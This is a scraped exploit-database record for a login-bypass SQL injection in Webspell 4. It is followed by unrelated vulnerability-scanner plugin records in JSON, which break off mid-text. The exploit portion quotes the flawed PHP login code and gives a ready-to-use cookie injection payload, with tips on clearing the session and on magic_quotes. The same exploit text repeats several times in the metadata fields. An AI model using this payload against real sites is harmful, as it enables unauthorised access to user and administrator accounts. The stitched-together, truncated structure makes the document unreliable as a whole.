ID 1337DAY-ID-4594 Type zdt Reporter 0day Today Team Modified 2009-01-03T00:00:00
Description
Exploit for unknown platform in category web applications
====================================================
Webspell 4 (Auth Bypass) SQL Injection Vulnerability
====================================================
#Webspell Login Bypass
#Found by: h0yt3r
#
##
#Checklogin.php Line 60:
#
# setcookie("ws_auth", $ds['userID'].":".$ws_pwd, time()+($sessionduration*60*60));
# $login = 1;
#
##
#_functions.php Line 253:
#
# $login_per_cookie = false;
# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {
# $login_per_cookie = true;
# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
# }
##
#src/login.php:
#
# global $userID, $loggedin;
#
# $userID = 0;
# $loggedin=false;
#
# if(isset($_SESSION['ws_auth'])) {
# if(stristr($_SESSION['ws_auth'], "userid")===FALSE){
# $authent = explode(":", $_SESSION['ws_auth']);
# $ws_user = sprintf('%u', $authent[0]);
#
# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???
# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);
#
# if(isset($ws_user) AND isset($ws_pwd)) {
#
# $check = safe_query("SELECT userID FROM ".PREFIX."user WHERE userID='$ws_user' AND password='$ws_pwd'");
#
# while($ds=mysql_fetch_array($check)) {
# $loggedin=true;
# $userID=$ds['userID'];
# }
# }
# } else die();
# }
# ?>
#
#
####
// ws_pwd must be a string without spaces and with a maximum length of 32
$ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);
Wuta fuck is dis crap?!
$_COOKIE['ws_auth'] can be exploited by somting like dis:
1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)
And btw:
$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
So dont foget to delete teh session...
Bad thing: Only works wit magic_quotes == off
But they got some function:
#_functions.php:74
#function sql_quote($value) {
#
# if( get_magic_quotes_gpc() ) {
# $value = stripslashes( $value );
# }
# if( function_exists( "mysql_real_escape_string" ) ) {
# $value = mysql_real_escape_string( $value );
# }
# else
# {
# $value = addslashes( $value );
# }
# return $value;
#}
And why in the world isnt it used?!
~END~
# 0day.today [2018-03-10] #
{"hash": "5b768228654b30091d4c53b6a6c425a32ef476265c9fc0515972296822b83a1a", "id": "1337DAY-ID-4594", "lastseen": "2018-03-11T01:10:00", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ee43afdb84ed7cbc2768aa19f785512e", "key": "href"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "modified"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "4c0250142a1f9257b18f040d3c5103f3", "key": "sourceData"}, {"hash": "167a287a41e8d4627b7829f39d9558fe", "key": "sourceHref"}, {"hash": "8ddfff8606576b32069f96f65dd71334", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-03-11T01:10:00"}, "dependencies": {"references": [{"type": "cloudfoundry", "idList": ["CFOUNDRY:CD984900F2B581632FB9816EFFC5EA33"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843627", "OPENVAS:1361412562310843626"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3753-2.NASL", "UBUNTU_USN-3753-1.NASL", "APPLETV_9_2_2.NASL"]}, {"type": "ubuntu", "idList": ["USN-3753-2", "USN-3753-1"]}, {"type": "metasploit", "idList": ["MSF:POST/LINUX/GATHER/ENUM_COMMANDS", "MSF:POST/LINUX/MANAGE/IPTABLES_REMOVAL", "MSF:POST/LINUX/MANAGE/PSEUDO_SHELL", "MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC", "MSF:EXPLOIT/WINDOWS/HTTP/EASYCHATSERVER_SEH", "MSF:EXPLOIT/UNIX/WEBAPP/WP_FOXYPRESS_UPLOAD", "MSF:EXPLOIT/UNIX/WEBAPP/WP_PLATFORM_EXEC"]}, {"type": "zdt", "idList": ["1337DAY-ID-26798", "1337DAY-ID-24887", "1337DAY-ID-24882"]}, {"type": "exploitdb", "idList": ["EDB-ID:39402"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135533"]}], "modified": "2018-03-11T01:10:00"}, "vulnersScore": 0.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4594", "description": "Exploit for unknown platform in category web applications", "title": "Webspell 4 (Auth Bypass) SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "efd5f079e7cef6cd1407fb995dfefd412b2d52be8b63cda3b24963f682dd9cc5", "id": "1337DAY-ID-4594", "lastseen": "2016-04-20T00:53:42", "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T00:53:42"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8934742e7a8f58285232341e99256ad0", "key": "sourceHref"}, {"hash": "86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "published"}, {"hash": "8ddfff8606576b32069f96f65dd71334", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "190a5ffa5bb75fa0af78ba2f53d01240", "key": "modified"}, {"hash": "bab414f2c90e6fdf0fe3b539f77ae9f3", "key": "sourceData"}, {"hash": "5ac8c50ee8dcb67324314d58f44dc9be", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/4594", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Webspell 4 (Auth Bypass) SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nWebspell 4 (Auth Bypass) SQL Injection Vulnerability\r\n====================================================\r\n\r\n\r\n#Webspell Login Bypass\r\n#Found by: h0yt3r\r\n#\r\n##\r\n#Checklogin.php Line 60:\r\n#\r\n# setcookie(\"ws_auth\", $ds['userID'].\":\".$ws_pwd, time()+($sessionduration*60*60));\r\n# $login = 1;\r\n#\r\n##\r\n#_functions.php Line 253:\r\n#\r\n# $login_per_cookie = false;\r\n# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {\r\n# $login_per_cookie = true;\r\n# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\n# }\r\n##\r\n#src/login.php:\r\n#\r\n# global $userID, $loggedin;\r\n#\r\n# $userID = 0;\r\n# $loggedin=false;\r\n#\r\n# if(isset($_SESSION['ws_auth'])) {\r\n# if(stristr($_SESSION['ws_auth'], \"userid\")===FALSE){\r\n# $authent = explode(\":\", $_SESSION['ws_auth']);\r\n# $ws_user = sprintf('%u', $authent[0]);\r\n#\r\n# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???\r\n# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n#\r\n# if(isset($ws_user) AND isset($ws_pwd)) {\r\n#\r\n# $check = safe_query(\"SELECT userID FROM \".PREFIX.\"user WHERE userID='$ws_user' AND password='$ws_pwd'\");\r\n#\r\n# while($ds=mysql_fetch_array($check)) {\r\n# $loggedin=true;\r\n# $userID=$ds['userID'];\r\n# }\r\n# }\r\n# } else die();\r\n# }\r\n# ?>\r\n#\r\n#\r\n####\r\n\r\n// ws_pwd must be a string without spaces and with a maximum length of 32\r\n $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n\r\nWuta fuck is dis crap?!\r\n$_COOKIE['ws_auth'] can be exploited by somting like dis:\r\n1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)\r\nAnd btw:\r\n$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\nSo dont foget to delete teh session...\r\nBad thing: Only works wit magic_quotes == off\r\n\r\nBut they got some function:\r\n#_functions.php:74\r\n#function sql_quote($value) {\r\n#\r\n# if( get_magic_quotes_gpc() ) {\r\n# $value = stripslashes( $value );\r\n# }\r\n# if( function_exists( \"mysql_real_escape_string\" ) ) {\r\n# $value = mysql_real_escape_string( $value );\r\n# }\r\n# else\r\n# {\r\n# $value = addslashes( $value );\r\n# }\r\n# return $value;\r\n#}\r\nAnd why in the world isnt it used?!\r\n\r\n~END~\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2009-01-03T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2009-01-03T00:00:00", "href": "http://0day.today/exploit/description/4594"}, "lastseen": "2016-04-20T00:53:42", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nWebspell 4 (Auth Bypass) SQL Injection Vulnerability\r\n====================================================\r\n\r\n\r\n#Webspell Login Bypass\r\n#Found by: h0yt3r\r\n#\r\n##\r\n#Checklogin.php Line 60:\r\n#\r\n# setcookie(\"ws_auth\", $ds['userID'].\":\".$ws_pwd, time()+($sessionduration*60*60));\r\n# $login = 1;\r\n#\r\n##\r\n#_functions.php Line 253:\r\n#\r\n# $login_per_cookie = false;\r\n# if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {\r\n# $login_per_cookie = true;\r\n# $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\n# }\r\n##\r\n#src/login.php:\r\n#\r\n# global $userID, $loggedin;\r\n#\r\n# $userID = 0;\r\n# $loggedin=false;\r\n#\r\n# if(isset($_SESSION['ws_auth'])) {\r\n# if(stristr($_SESSION['ws_auth'], \"userid\")===FALSE){\r\n# $authent = explode(\":\", $_SESSION['ws_auth']);\r\n# $ws_user = sprintf('%u', $authent[0]);\r\n#\r\n# // ws_pwd must be a string without spaces and with a maximum length of 32 <- ???\r\n# $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n#\r\n# if(isset($ws_user) AND isset($ws_pwd)) {\r\n#\r\n# $check = safe_query(\"SELECT userID FROM \".PREFIX.\"user WHERE userID='$ws_user' AND password='$ws_pwd'\");\r\n#\r\n# while($ds=mysql_fetch_array($check)) {\r\n# $loggedin=true;\r\n# $userID=$ds['userID'];\r\n# }\r\n# }\r\n# } else die();\r\n# }\r\n# ?>\r\n#\r\n#\r\n####\r\n\r\n// ws_pwd must be a string without spaces and with a maximum length of 32\r\n $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);\r\n\r\nWuta fuck is dis crap?!\r\n$_COOKIE['ws_auth'] can be exploited by somting like dis:\r\n1:'or/**/1=1/**/limit/**/0,1# (# <- is a comment, dont forget...)\r\nAnd btw:\r\n$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];\r\nSo dont foget to delete teh session...\r\nBad thing: Only works wit magic_quotes == off\r\n\r\nBut they got some function:\r\n#_functions.php:74\r\n#function sql_quote($value) {\r\n#\r\n# if( get_magic_quotes_gpc() ) {\r\n# $value = stripslashes( $value );\r\n# }\r\n# if( function_exists( \"mysql_real_escape_string\" ) ) {\r\n# $value = mysql_real_escape_string( $value );\r\n# }\r\n# else\r\n# {\r\n# $value = addslashes( $value );\r\n# }\r\n# return $value;\r\n#}\r\nAnd why in the world isnt it used?!\r\n\r\n~END~\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-10] #", "published": "2009-01-03T00:00:00", "references": [], "reporter": "0day Today Team", "modified": "2009-01-03T00:00:00", "href": "https://0day.today/exploit/description/4594"}
{"nessus": [{"lastseen": "2019-11-01T02:07:09", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The snd_msndmidi_input_read function in\n sound/isa/msnd/msnd_midi.c in the Linux kernel through\n 4.11.7 allows local users to cause a denial of service\n (over-boundary access) or possibly have unspecified\n other impact by changing the value of a message queue\n head pointer between two kernel reads of that value,\n aka a ", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1523.NASL", "href": "https://www.tenable.com/plugins/nessus/124976", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1523)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124976);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2013-2899\",\n \"CVE-2014-3601\",\n \"CVE-2014-6410\",\n \"CVE-2015-0572\",\n \"CVE-2015-8709\",\n \"CVE-2015-8953\",\n \"CVE-2016-10150\",\n \"CVE-2016-3841\",\n \"CVE-2016-4805\",\n \"CVE-2016-9120\",\n \"CVE-2017-10663\",\n \"CVE-2017-11473\",\n \"CVE-2017-12168\",\n \"CVE-2017-12193\",\n \"CVE-2017-14489\",\n \"CVE-2017-16644\",\n \"CVE-2017-16648\",\n \"CVE-2017-7533\",\n \"CVE-2017-9985\",\n \"CVE-2018-10879\"\n );\n script_bugtraq_id(\n 62046,\n 69489,\n 69799\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1523)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The snd_msndmidi_input_read function in\n sound/isa/msnd/msnd_midi.c in the Linux kernel through\n 4.11.7 allows local users to cause a denial of service\n (over-boundary access) or possibly have unspecified\n other impact by changing the value of a message queue\n head pointer between two kernel reads of that value,\n aka a 'double fetch' vulnerability.(CVE-2017-9985)\n\n - An assertion failure issue was found in the Linux\n kernel's KVM hypervisor module built to support\n visualization on ARM64 architecture platforms. The\n failure could occur while accessing Performance\n Monitors Cycle Count Register (PMCCNTR) from a guest. A\n privileged guest user could use this flaw to crash the\n host kernel resulting in denial of\n service.(CVE-2017-12168)\n\n - The iscsi_if_rx() function in\n 'drivers/scsi/scsi_transport_iscsi.c' in the Linux\n kernel from v2.6.24-rc1 through 4.13.2 allows local\n users to cause a denial of service (a system panic) by\n making a number of certain syscalls by leveraging\n incorrect length validation in the kernel\n code.(CVE-2017-14489)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The dvb frontend management subsystem in the Linux\n kernel contains a use-after-free which can allow a\n malicious user to write to memory that may be assigned\n to another kernel structure. This could create memory\n corruption, panic, or possibly other side\n affects.(CVE-2017-16648)\n\n - It was found that the Linux kernel's IPv6\n implementation mishandled socket options. A local\n attacker could abuse concurrent access to the socket\n options to escalate their privileges, or cause a denial\n of service (use-after-free and system crash) via a\n crafted sendmsg system call.(CVE-2016-3841)\n\n - A flaw was found in the Linux kernel's ext4 filesystem.\n A local user can cause a use-after-free in\n ext4_xattr_set_entry function and a denial of service\n or unspecified other impact may occur by renaming a\n file in a crafted ext4 filesystem\n image.(CVE-2018-10879)\n\n - A race condition was found in the Linux kernel, present\n since v3.14-rc1 through v4.12. The race happens between\n threads of inotify_handle_event() and vfs_rename()\n while running the rename operation against the same\n file. As a result of the race the next slab data or the\n slab's free list pointer can be corrupted with\n attacker-controlled data, which may lead to the\n privilege escalation.(CVE-2017-7533)\n\n - A privilege-escalation vulnerability was discovered in\n the Linux kernel built with User Namespace\n (CONFIG_USER_NS) support. The flaw occurred when the\n ptrace() system call was used on a root-owned process\n to enter a user namespace. A privileged namespace user\n could exploit this flaw to potentially escalate their\n privileges on the system, outside the original\n namespace.(CVE-2015-8709)\n\n - Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n before 4.5.2 allows local users to cause a denial of\n service (memory corruption and system crash, or\n spinlock) or possibly have unspecified other impact by\n removing a network namespace, related to the\n ppp_register_net_channel and ppp_unregister_channel\n functions.(CVE-2016-4805)\n\n - A flaw was found in the way the Linux kernel's\n kvm_iommu_map_pages() function handled IOMMU mapping\n failures. A privileged user in a guest with an assigned\n host device could use this flaw to crash the\n host.(CVE-2014-3601)\n\n - A flaw was found in the Linux kernel's implementation\n of associative arrays introduced in 3.13. This\n functionality was backported to the 3.10 kernels in Red\n Hat Enterprise Linux 7. The flaw involved a null\n pointer dereference in assoc_array_apply_edit() due to\n incorrect node-splitting in assoc_array implementation.\n This affects the keyring key type and thus key addition\n and link creation operations may cause the kernel to\n panic.(CVE-2017-12193)\n\n - Multiple race conditions in drivers/char/adsprpc.c and\n drivers/char/adsprpc_compat.c in the ADSPRPC driver for\n the Linux kernel 3.x, as used in Qualcomm Innovation\n Center (QuIC) Android contributions for MSM devices and\n other products, allow attackers to cause a denial of\n service (zero-value write) or possibly have unspecified\n other impact via a COMPAT_FASTRPC_IOCTL_INVOKE_FD ioctl\n call.(CVE-2015-0572)\n\n - The sanity_check_ckpt function in fs/f2fs/super.c in\n the Linux kernel before version 4.12.4 does not\n validate the blkoff and segno arrays. This allows an\n unprivileged, local user to cause a system panic and\n DoS. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-10663)\n\n - A stack overflow flaw caused by infinite recursion was\n found in the way the Linux kernel's Universal Disk\n Format (UDF) file system implementation processed\n indirect Information Control Blocks (ICBs). An attacker\n with physical access to the system could use a\n specially crafted UDF image to crash the\n system.(CVE-2014-6410)\n\n - Race condition in the ion_ioctl function in\n drivers/staging/android/ion/ion.c in the Linux kernel\n before 4.6 allows local users to gain privileges or\n cause a denial of service (use-after-free) by calling\n ION_IOC_FREE on two CPUs at the same\n time.(CVE-2016-9120)\n\n - drivers/hid/hid-picolcd_core.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_PICOLCD is enabled, allows\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and OOPS) via a\n crafted device.(CVE-2013-2899)\n\n - A flaw was found in the Linux kernel's implementation\n of overlayfs. An attacker can leak file resources in\n the system by opening a large file with write\n permissions on a overlay filesystem that is\n insufficient to deal with the size of the write.When\n unmounting the underlying device, the system is unable\n to free an inode and this will consume resources.\n Repeating this for all available inodes and memory will\n create a denial of service situation.(CVE-2015-8953)\n\n - Buffer overflow in the mp_override_legacy_irq()\n function in arch/x86/kernel/acpi/boot.c in the Linux\n kernel through 4.12.2 allows local users to gain\n privileges via a crafted ACPI table.(CVE-2017-11473)\n\n - Use-after-free vulnerability in the\n kvm_ioctl_create_device function in virt/kvm/kvm_main.c\n in the Linux kernel before 4.8.13 allows host OS users\n to cause a denial of service (host OS crash) or\n possibly gain privileges via crafted ioctl calls on the\n /dev/kvm device.(CVE-2016-10150)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1523\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ab359ca\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:34:20", "bulletinFamily": "scanner", "description": "USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-12233)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly handle an error condition with a corrupted xfs\nimage. An attacker could use this to construct a malicious xfs image\nthat, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13094)\n\nIt was discovered that the Linux kernel did not properly handle setgid\nfile creation when performed by a non-member of the group. A local\nattacker could use this to gain elevated privileges. (CVE-2018-13405)\n\nSilvio Cesare discovered that the generic VESA frame buffer driver in\nthe Linux kernel contained an integer overflow. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-13406).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3753-2.NASL", "href": "https://www.tenable.com/plugins/nessus/112112", "published": "2018-08-24T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerabilities (USN-3753-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3753-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112112);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13168\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-12233\", \"CVE-2018-13094\", \"CVE-2018-13405\", \"CVE-2018-13406\");\n script_xref(name:\"USN\", value:\"3753-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial, linux-aws vulnerabilities (USN-3753-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3753-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly enforce permissions on kernel memory access. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2017-13168)\n\nWen Xu discovered that a use-after-free vulnerability existed in the\next4 filesystem implementation in the Linux kernel. An attacker could\nuse this to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10876, CVE-2018-10879)\n\nWen Xu discovered that a buffer overflow existed in the ext4\nfilesystem implementation in the Linux kernel. An attacker could use\nthis to construct a malicious ext4 image that, when mounted, could\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-10877)\n\nWen Xu discovered that an out-of-bounds write vulnerability existed in\nthe ext4 filesystem implementation in the Linux kernel. An attacker\ncould use this to construct a malicious ext4 image that, when mounted,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-10878, CVE-2018-10882)\n\nWen Xu discovered that the ext4 filesystem implementation in the Linux\nkernel did not properly keep meta-data information consistent in some\nsituations. An attacker could use this to construct a malicious ext4\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-10881)\n\nShankara Pailoor discovered that the JFS filesystem implementation in\nthe Linux kernel contained a buffer overflow when handling extended\nattributes. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary 